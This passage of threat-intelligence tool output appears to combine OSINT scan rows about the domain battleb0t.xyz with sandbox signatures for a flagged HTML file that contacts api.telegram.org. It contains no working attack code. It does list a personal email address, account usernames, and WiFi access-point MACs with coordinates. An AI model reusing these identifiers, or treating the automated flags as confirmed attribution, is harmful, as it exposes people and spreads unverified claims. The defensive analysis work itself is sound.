"\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3ec_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_3ec_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_3ec_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_3ec_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_3ec_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "172.66.40.106:443"\n "162.241.219.194:443"\n "35.186.254.174:443"\n "198.35.26.96:443"\n "198.35.26.112:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "en.wikipedia.org"\n "llink.to"\n "track.salesflare.com"\n "upload.wikimedia.org"\n "www.guelphcrc.ca"\n "www.wikipedia.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "wikipedia-tagline-en_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wikipedia-wordmark-en_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "language_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "magnify-clip-ltr_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "link-external-small-ltr-progressive_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "ellipsis_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "search_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "arrow-down_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "menu_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "arrow-down-progressive_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "bullet-icon_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"Office_Online_1_.png" has type "PNG image data 300 x 213 8-bit/color RGBA non-interlaced" and extension "png"\n "OfficeMobile2013_WP8_1_.png" has type "PNG image data 220 x 193 8-bit/color RGBA non-interlaced" and extension "png"\n "Word_on_iPhone_1_.jpg" has type "JPEG image data baseline precision 8 220x390 components 3" and extension "jpg"\n "Office_mobile_apps_1_.png" has type "PNG image data 220 x 143 8-bit/color RGB non-interlaced" and extension "png"\n "Microsoft_Office_for_Mac_2021_screenshots_1_.png" has type "PNG image data 220 x 124 8-bit/color RGBA non-interlaced" and extension "png"\n "wikipedia_1_.png" has type "PNG image data 100 x 100 8-bit/color RGBA non-interlaced" and extension "png"\n "Office_4.0_Suite_1_.jpg" has type "JPEG image data baseline precision 8 240x180 components 3" and extension "jpg"\n "Office_365_app_logos.svg_1_.png" has type "PNG image data 220 x 74 8-bit/color RGBA non-interlaced" and extension "png"\n "Microsoft_Office_logo__2019-present_.svg_1_.png" has type "PNG image data 120 x 120 8-bit/color RGBA non-interlaced" and extension "png"\n "Microsoft_Office_2013-2019_logo_and_wordmark.svg_1_.png" has type "PNG image data 220 x 70 8-bit colormap non-interlaced" and extension "png"\n "wikimedia-button_1_.png" has type "PNG image data 88 x 31 8-bit/color RGBA non-interlaced" and extension "png"\n "poweredby_mediawiki_88x31_1_.png" has type "PNG image data 88 x 31 8-bit colormap non-interlaced" and extension "png"\n "Symbol_category_class.svg_1_.png" has type "PNG image data 16 x 16 8-bit colormap non-interlaced" and extension "png"\n "16px-Symbol_list_class.svg_1_.png" has type "PNG image data 16 x 16 8-bit colormap non-interlaced" and extension "png"\n "20px-Semi-protection-shackle.svg_1_.png" has type "PNG image data 20 x 20 8-bit colormap non-interlaced" and extension "png"\n "Symbol_na_class.svg_1_.png" has type "PNG image data 16 x 16 8-bit gray+alpha non-interlaced" and extension "png"\n "OOjs_UI_icon_edit-ltr-progressive.svg_1_.png" has type "PNG image data 10 x 10 8-bit colormap non-interlaced" and extension "png"\n "Icon_pdf_file_1_.png" has type "PNG image data 16 x 16 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"wikipedia-tagline-en_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "wikipedia-wordmark-en_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "language_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "magnify-clip-ltr_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "link-external-small-ltr-progressive_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "ellipsis_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "search_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "arrow-down_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "menu_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "arrow-down-progressive_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "bullet-icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "Microsoft_Office_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "load_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "Office_Online_1_.png" has type "PNG image data 300 x 213 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Cab1BAA.tmp" has type "data"- Location: [%TEMP%\\Cab1BAA.tmp]- [targetUID: 00000000-00004080]\n "load_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "OfficeMac_v_X_1_.PNG" has type "PNG image data 125 x 164 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "OfficeMobile2013_WP8_1_.png" has type "PNG image data 220 x 193 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Word_on_iPhone_1_.jpg" has type "JPEG image data baseline precision 8 220x390 components 3"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001004]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Office_mobile_apps_1_.png" has type "PNG image data 220 x 143 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "~DFAB70199ED6534FEB.TMP" has type "data"- Location: [%TEMP%\\~DFAB70199ED6534FEB.TMP]- [targetUID: 00000000-00001004]\n "~DFD80A45019488F2CC.TMP" has type "data"- Location: [%TEMP%\\~DFD80A45019488F2CC.TMP]- [targetUID: 00000000-00 | 185.199.111.153 |
| 2023-05-12 02:44:14 | SSL Certificate Host Mismatch | Yes | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | *.netlify.app, netlify.app | pics.battleb0t.xyz |
| 2023-05-12 02:53:22 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 104.21.71.14 | nwapi2.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 6dgs-guest (Net ID: 00:06:B1:28:66:5F) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:37:29 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | Frankfurt Am Main, Germany | 207.154.228.169 |
| 2023-05-12 02:56:30 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | Germany, Hesse, Frankfurt am Main | 165.232.113.85 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.102): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Private (Net ID: 00:06:B1:20:D3:D2) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:00:23 | Blacklisted IP Address | Yes | Honeypot Checker | 0 | 1 | 2 | 0 | None | Honeypotproject (188.114.97.1): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.1 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Microsoft websites | cdn-185-199-111-153.github.com |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 5247 4331 (Net ID: 00:00:C5:AA:78:1C) | 37.7642, -122.3993 |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | GitLab (Category: coding)
https://gitlab.com/_BattleB0t_ | _BattleB0t_ |
| 2023-05-12 03:07:57 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 185.199.108.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:55:25 | Username | No | Social Network Identifier | 0 | 0 | 4 | 0 | None | Altpapier | https://github.com/Altpapier/SkyHelperAPI/tree/master/examples |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00-duino.github.io]
https://www.openphish.com/feed.txt | 00-duino.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomDB2CA4 (Net ID: 00:0C:F6:DB:2C:A4) | 50.8897, 6.0563 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Duolingo (Category: hobby)
https://www.duolingo.com/profile/ayshoo | ayshoo |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ASI (Net ID: 00:02:6F:51:19:D9) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | fernando.r@alliedglobal.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 15, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'MSG349337853.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7544:120:WilError_01"\n "Local\\SM0:7544:304:WilStaging_02"\n "Local\\SM0:7544:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7544:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7328:304:WilStaging_02"\n "Local\\SM0:7328:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7188:304:WilStaging_02"\n "Local\\SM0:7188:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"\n "getbootstrap.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.58.100:49728"\n "185.199.109.153:49730"\n "13.35.125.109:49731"\n "149.154.167.220:49732"\n "51.11.192.48:49736"'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - Possible RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'Internal YARA signature for possible RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-38', u'name': u'Drops PE files with different extensions', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1036', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-177', u'attck_id': u'T1036', u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7544_1106606490\\Part-RU]- [targetUID: 00000000-00007544]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"edge_tracking_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7544_553046708\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007544]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007544]\n "21a2e4ad-e3da-41b8-9593-fd6b14c8cd58.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\21a2e4ad-e3da-41b8-9593-fd6b14c8cd58.tmp]- [targetUID: 00000000-00007544]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.24\\manifest.json]- [targetUID: 00000000-00007544]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007544]\n "2e8e03b2-b8a9-4702-ad28-272010504828.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\2e8e03b2-b8a9-4702-ad28-272010504828.tmp]- [targetUID: 00000000-00007544]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.24\\Ruleset Data]- [targetUID: 00000000-00007544]\n "Session_13320464616168949" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Session_13320464616168949]- [targetUID: 00000000-00007544]\n "645c73c7-b711-4558-a7af-9f09cc1391b4.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\645c73c7-b711-4558-a7af-9f09cc1391b4.tmp]- [targetUID: 00000000-00007544]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\7544_1106606490\\Filtering Rules-AA]- [targetUID: 00000000-00007544]\n "608c2647-0afe-41c3-8b3c-3682b3d2a73a.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\608c2647-0afe-41c3-8b3c-3682b3d2a73a.tmp]- [targetUID: 00000000-00007544]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7544_553046708\\shoppingfre.js]- [targetUID: 00000000-00007544]\n "8bb5048e-d66c-4c42-9ef2-04ce3c812e6f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8bb5048e-d66c-4c42-9ef2-04ce3c812e6f.tmp]- [targetUID: 00000000-00007544]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007272]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007544]\n "7406036f-2f9e-4939-8d5b-442a52cfa1c5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7406036f-2f9e-4939-8d5b-442a52cfa1c5.tmp]- [targetUID: 00000000-00007544]\n "LOG" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\LOG]- [targetUID: 00000000-00007544]\n "manifest.fingerprint" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.24\\manifest.fingerprint]- [targetUID: 00000000-00007544]\n "Variations" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Variations]- [targetUID: 00000000-00007544]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.41"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "\',\'QtjLP\',\'KDqei\',\'vXqYi\',\'GOqYh\',\'gISTU\',\'n()\\x20\',\'roJBb\',\'FXzcw\',\'__pro\',\'warn\',\'PukFk\',\'EAlzP\',\'YvMmB\',\'iiLHY\',\'tQrEe\',\'mGJfV\',\'strin\',\'pbBLV\',\'KlDNI\',\'nbsJn\',\'kVpKR\',\'BiHjg\',\'FNmxz\',\'sWuxZ\',\'ZOmpK\',\'om%2f\',\'FpgMT\',\'sjuIm\',\'style\',\'round\',\'EuVvW\',\'Qydg"\n Heuristic match: "api.telegram.org"\n Heuristic match: "getbootstrap.com"\n Heuristic match: "fernando.r@alliedglobal.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-63', u'name': u'Found a potential E-Mail address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1114', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1114', u'relevance': 3, u'threat_level': 